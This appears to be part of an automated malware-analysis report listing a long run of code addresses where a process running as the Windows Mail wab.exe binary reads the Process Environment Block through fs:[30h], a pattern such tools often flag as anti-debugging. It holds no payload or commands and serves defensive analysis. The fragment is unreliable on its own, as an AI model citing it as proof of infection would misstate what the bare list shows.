Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214080A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214360B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214360B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21418350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21390310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141437C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2142C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214143D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214143D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139438F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139438F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A63FF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136823B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136826B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21376259 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F8243 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F8243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213802A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213802A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE284 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE284 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21406500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378550 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21378550 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213945B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213945B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE59C mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A4588 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21372582 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21372582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213725E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AC5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AC5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213765D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AA430 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213FC460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2139245A mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A44B0 mov ecx, dword ptr fs:[00000030h]10_2_213A44B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FA4B0 mov eax, dword ptr fs:[00000030h]10_2_213FA4B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213764AB mov eax, dword ptr fs:[00000030h]10_2_213764AB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213704E5 mov ecx, dword ptr fs:[00000030h]10_2_213704E5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov eax, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov ecx, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov eax, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EC730 mov eax, dword ptr fs:[00000030h]10_2_213EC730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC720 mov eax, dword ptr fs:[00000030h]10_2_213AC720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC720 mov eax, dword ptr fs:[00000030h]10_2_213AC720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370710 mov eax, dword ptr fs:[00000030h]10_2_21370710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0710 mov eax, dword ptr fs:[00000030h]10_2_213A0710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC700 mov eax, dword ptr fs:[00000030h]10_2_213AC700
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378770 mov eax, dword ptr fs:[00000030h]10_2_21378770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE75D mov eax, dword ptr fs:[00000030h]10_2_213FE75D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370750 mov eax, dword ptr fs:[00000030h]10_2_21370750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F4755 mov eax, dword ptr fs:[00000030h]10_2_213F4755
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2750 mov eax, dword ptr fs:[00000030h]10_2_213B2750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2750 mov eax, dword ptr fs:[00000030h]10_2_213B2750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov esi, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov eax, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov eax, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213707AF mov eax, dword ptr fs:[00000030h]10_2_213707AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213747FB mov eax, dword ptr fs:[00000030h]10_2_213747FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213747FB mov eax, dword ptr fs:[00000030h]10_2_213747FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141678E mov eax, dword ptr fs:[00000030h]10_2_2141678E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE7E1 mov eax, dword ptr fs:[00000030h]10_2_213FE7E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137C7C0 mov eax, dword ptr fs:[00000030h]10_2_2137C7C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F07C3 mov eax, dword ptr fs:[00000030h]10_2_213F07C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A6620 mov eax, dword ptr fs:[00000030h]10_2_213A6620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8620 mov eax, dword ptr fs:[00000030h]10_2_213A8620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137262C mov eax, dword ptr fs:[00000030h]10_2_2137262C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E627 mov eax, dword ptr fs:[00000030h]10_2_2138E627
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2619 mov eax, dword ptr fs:[00000030h]10_2_213B2619
